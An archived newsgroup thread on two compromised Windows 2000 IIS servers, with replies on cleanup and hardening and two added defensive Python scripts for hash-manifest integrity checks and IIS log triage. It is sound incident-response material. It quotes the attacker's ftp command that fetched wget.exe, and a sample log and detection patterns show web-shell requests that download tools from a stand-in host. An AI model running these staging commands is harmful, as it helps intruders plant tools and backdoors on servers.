Server Hacked - Assessment and Prevention

Archived from groups: microsoft.public.win2000.security

I have 2 Windows 2000 Server machines running IIS, which have been
compromised. I am trying to determine to what extent and, more importantly,
prevent this from recurring.

I first noticed an issue because I received a virus alert from my Virus
scanning software on the servers indicating the following:

The file C:\WINNT\system32\full.exe\000ae8a4.EXE is infected with
HackerDefender.sys Trojan. The file was successfully deleted. user NT
AUTHORITY\SYSTEM

When I check the Server monitors, I found a command prompt open on the
screen, with the following:


C:\WINNT\system32>ftp -v -A -s:ftp.scr xxx.xxx.xxx.xxx
Anonymous login succeeded for SYSTEM@server1.domain.com
ftp>get wget.exe
ftp>

(Note: I have replaced the hacker's IP in the message above with x's)

I checked the security log and found that the intruder has cleared the
entries from that day. I have deleted ftp.scr from the server.

How can I prevent this from recurring? How can I determine what, if any,
damage has been done?
  1. Archived from groups: microsoft.public.win2000.security

    This machine was/is 100% patched.

    Also, the ftp.scr script simply contained the following line:
    get wget.exe

    Also, on the one machine, although FTP is enabled, Allow Anonymous is not.
    The other machine does not have FTP running at all.

    Reformatting is not an option right now.

    I've looked for the following:
    - Any weird programs installed - none
    - Any new directories - none
    - Any weird user accounts - none
    - Any weird ports connected - none

    I have also since changed the local administrator password.

    My assumption is that the system account was compromised. If it was, how
    can I prevent someone from regaining access using this account?
  2. Archived from groups: microsoft.public.win2000.security

    > Reformatting is not an option right now.
    >

    > I've looked for the following:
    > - Any weird programs installed - none
    > - Any new directories - none
    > - Any weird user accounts - none
    > - Any weird ports connected - none

    New files?
    Renamed files?


    How can you be 100% sure they did not rename a Trojan to a system file
    (Notepad, WordPad, defrag, maybe) that when executed will just reinstall
    the Trojan and open your computer up to him again?

    I would seriously reconsider this position.

    > My assumption is that the system account was compromised. If it was, how
    > can I prevent someone from regaining access using this account?


    By first making sure he did not hide something on your systems that will
    reactivate, or reinstall itself on reboot or by you opening a program that
    "suddenly" doesn't work. Or so you think. It *may* be the renamed Trojan
    reinstalling itself quietly. To be 100% sure you would have to format and
    restore from a known good backup.


    hth
    DDS W 2k MVP MCSE

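The renamed-Trojan scenario DDS describes is exactly what a hash manifest catches. The following is an added example, not code from this thread or from any tool named in it: it builds a SHA-256 manifest of a known-good directory tree, diffs a later snapshot against it, reports new, missing and modified files, and flags any new file whose bytes are identical to a known-good binary (the real notepad.exe stashed under another name while a dropper takes its place). The directory names and file contents in `demo()` are constructed for the demonstration.

```python
"""Hash-manifest integrity check for a Windows system directory.

Added example for this thread, not code from the posts or from any tool named
in them. Assumes you can hash a known-good tree first (or from backup media)
and the live tree afterwards. The sample tree built in demo() is constructed.
"""
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path, chunk=1 << 20):
    """Stream a file through SHA-256 so large binaries are not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root):
    """Map every file under root to its hash and size.

    Paths are stored relative and lower-cased because NTFS is case-insensitive.
    """
    root = Path(root)
    manifest = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            rel = p.relative_to(root).as_posix().lower()
            manifest[rel] = {"sha256": sha256_file(p), "size": p.stat().st_size}
    return manifest


def compare_manifests(baseline, current):
    """Classify the differences between a known-good manifest and a later one."""
    base_names, cur_names = set(baseline), set(current)
    added = sorted(cur_names - base_names)
    missing = sorted(base_names - cur_names)
    modified = sorted(n for n in base_names & cur_names
                      if baseline[n]["sha256"] != current[n]["sha256"])
    # A new file whose bytes equal a known-good binary is the signature of
    # "stash the real notepad.exe under another name, put the Trojan in its place".
    by_hash = {}
    for name, meta in baseline.items():
        by_hash.setdefault(meta["sha256"], []).append(name)
    stashed = {n: by_hash[current[n]["sha256"]] for n in added
               if current[n]["sha256"] in by_hash}
    return {"added": added, "missing": missing, "modified": modified,
            "stashed_originals": stashed}


def demo():
    """Constructed scenario: baseline a tree, tamper with it as the reply describes, diff."""
    with tempfile.TemporaryDirectory() as tmp:
        sysdir = Path(tmp) / "system32"
        sysdir.mkdir()
        for name, body in {"notepad.exe": b"MZ notepad", "wordpad.exe": b"MZ wordpad",
                           "defrag.exe": b"MZ defrag"}.items():
            (sysdir / name).write_bytes(body)
        baseline = build_manifest(sysdir)

        # Attacker: keep the real Notepad around, replace it with a dropper, add the fetched tool.
        (sysdir / "notepad.exe").rename(sysdir / "notepad.bak")
        (sysdir / "notepad.exe").write_bytes(b"MZ dropper that reinstalls the rootkit")
        (sysdir / "wget.exe").write_bytes(b"MZ wget")
        return compare_manifests(baseline, build_manifest(sysdir))


if __name__ == "__main__":
    for kind, items in demo().items():
        print(f"{kind}: {items}")
```

Take the live snapshot from a clean boot (mount the disk on a trusted machine, or boot from known-good media): Hacker Defender hooks the file-enumeration and file-open APIs inside the running OS, so a hashing pass run from the compromised Windows instance can be shown a clean view of a dirty disk. The baseline also goes stale with every hotfix, so rebuild the manifest after patching from the same trusted environment.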
  3. Archived from groups: microsoft.public.win2000.security

    As BM mentioned, be sure to run IIS Lockdown/URLScan on your IIS servers and
    run the MBSA tool to check for missing patches and other vulnerabilities. It
    is also best practice to keep your IIS content on a partition separate from
    the system partition. Trojans are usually installed willfully by a computer
    user, either through web browsing, email attachments, or installation from
    infected media, so be sure to review your practices for such. If the trojan
    was installed by an admin a lot of damage could be done. A firewall that
    manages inbound and outbound access with a default block rule can minimize
    the impact of a trojan, particularly in acting as a backdoor.

    There are free tools from Sysinternals such as Process Explorer, Autoruns,
    TCPView, Filemon, and RootkitRevealer that can help track down rogue
    processes/executables. From what you describe your server has been
    compromised and the attacker had or has system or administrator access.
    Being such, a clean install is the only way to make sure the system is
    repaired. Today's rootkits are very hard to detect and eliminate. But that
    is your call and maybe you will get lucky. The links below may help. ---
    Steve

    http://www.microsoft.com/technet/security/default.mspx
    http://www.sysinternals.com/ntw2k/freeware/rootkitreveal.shtml ---
    RootkitRevealer and link to SysInternals.
    http://www.microsoft.com/technet/security/tools/mbsahome.mspx --- MBSA
    http://www.securityfocus.com/infocus/1755 --- IIS Lockdown info.


  4. Archived from groups: microsoft.public.win2000.security


    Check your IIS logs, assuming they've not been deleted. Patch your machine.
    Install IISLockdown. If you have any logging available, determine which
    account was logged on to. Change its password.

    Report that IP address to abuse@ whoever owns it.

    I actually found in my IIS logs a while back an attempted exploit to
    remotely run some Perl code from a website. It was on GeoCities. I emailed
    them about it, and they removed it in two days, which I thought was pretty
    quick for a company of that size - though it'd have probably run out of
    bandwidth anyway ;)
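The IIS log check suggested in that reply can be scripted. This is an added example, not code from the thread: it parses IIS 5 W3C Extended log lines (the `#Fields:` header names the columns), URL-decodes each request, flags requests carrying the tool-download indicators seen in the original post (a scripted ftp session such as `ftp -A -s:ftp.scr`, tftp, wget, or an `echo` redirected into a file to build the script), and groups hits by client IP with first and last seen times. The sample log lines, the `/scripts/shell.asp` path and the address 203.0.113.9 are constructed for the demonstration, not evidence from the poster's servers.

```python
"""Triage IIS W3C Extended logs for command-staging activity.

Added example for this thread, not from the original posts. Assumes the IIS 5
W3C Extended log format: a '#Fields:' header names the space-separated
columns and timestamps are written in UTC. SAMPLE_LOG is constructed; the
/scripts/shell.asp path and 203.0.113.9 are hypothetical.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Indicators of the tool-download stage seen in the thread: a scripted ftp
# session, tftp, wget, or an echo redirected into a file (building ftp.scr).
STAGING_INDICATORS = {
    "cmd.exe": re.compile(r"\bcmd\.exe\b", re.I),
    "ftp-script": re.compile(r"\bftp(?:\.exe)?\s.*-(?:s:|A\b)", re.I),
    "tftp": re.compile(r"\btftp(?:\.exe)?\b", re.I),
    "wget": re.compile(r"\bwget(?:\.exe)?\b", re.I),
    "echo-to-file": re.compile(r"\becho\b[^>]*>\s*\S+", re.I),
}

# Constructed sample log (not real data from the poster's servers).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2004-09-01 03:12:07
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-09-01 03:12:07 10.0.0.5 GET /default.htm - 200
2004-09-01 03:14:22 203.0.113.9 GET /scripts/shell.asp - 200
2004-09-01 03:15:02 203.0.113.9 GET /scripts/shell.asp cmd=echo+get+wget.exe+%3Eftp.scr 200
2004-09-01 03:15:09 203.0.113.9 GET /scripts/shell.asp cmd=ftp+-v+-A+-s%3Aftp.scr+203.0.113.9 200
2004-09-01 03:15:40 203.0.113.9 GET /scripts/shell.asp cmd=wget.exe+http%3A%2F%2F203.0.113.9%2Ffull.exe 200
2004-09-01 03:20:00 10.0.0.8 GET /default.htm - 304
"""


def decode(s):
    """URL-decode, repeating while percent-escapes remain, to catch double encoding."""
    for _ in range(3):
        d = unquote_plus(s)
        if d == s:
            break
        s = d
    return s


def parse_w3c(text):
    """Turn W3C Extended log text into a list of dicts keyed by the #Fields names."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            parts = line.split(" ", len(fields) - 1)
            rows.append(dict(zip(fields, parts)))
    return rows


def triage(rows):
    """Flag staging requests and summarise activity per client IP."""
    flagged = []
    by_ip = defaultdict(lambda: {"hits": 0, "flagged": 0, "first": None,
                                 "last": None, "indicators": set()})
    for r in rows:
        ip = r.get("c-ip", "?")
        stamp = f"{r.get('date', '')} {r.get('time', '')}"
        s = by_ip[ip]
        s["hits"] += 1
        s["first"] = s["first"] or stamp
        s["last"] = stamp
        request = decode(f"{r.get('cs-uri-stem', '')} {r.get('cs-uri-query', '')}")
        hits = sorted(name for name, rx in STAGING_INDICATORS.items() if rx.search(request))
        if hits:
            s["flagged"] += 1
            s["indicators"].update(hits)
            flagged.append({"time": stamp, "ip": ip, "request": request, "indicators": hits})
    suspects = sorted(ip for ip, s in by_ip.items() if s["flagged"])
    return {"flagged": flagged, "by_ip": dict(by_ip), "suspects": suspects}


def triage_sample():
    """Run the triage over the constructed sample log."""
    return triage(parse_w3c(SAMPLE_LOG))


if __name__ == "__main__":
    result = triage_sample()
    for f in result["flagged"]:
        print(f"{f['time']} {f['ip']} {f['indicators']} {f['request']}")
    for ip in result["suspects"]:
        s = result["by_ip"][ip]
        print(f"suspect {ip}: {s['hits']} requests, {s['flagged']} flagged, "
              f"{s['first']} .. {s['last']}")
```

IIS writes W3C Extended timestamps in UTC, so line the flagged window up against the antivirus alert and the gap in the (cleared) Security log in the same zone. An attacker who could wipe the Security log could also have edited the IIS log, so treat an absence of hits as inconclusive and compare against a backup copy of the log file if one exists.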
  5. Archived from groups: microsoft.public.win2000.security

    If your server was really fully patched, then I assume either a sub-optimal
    configuration or a different app that wasn't patched was the problem.
    Usually these compromises are done via well known issues. I recommend
    these:

    http://securityadmin.info/faq.asp#ftpfolder
    http://securityadmin.info/faq.asp#hacked
    http://securityadmin.info/faq.asp#harden

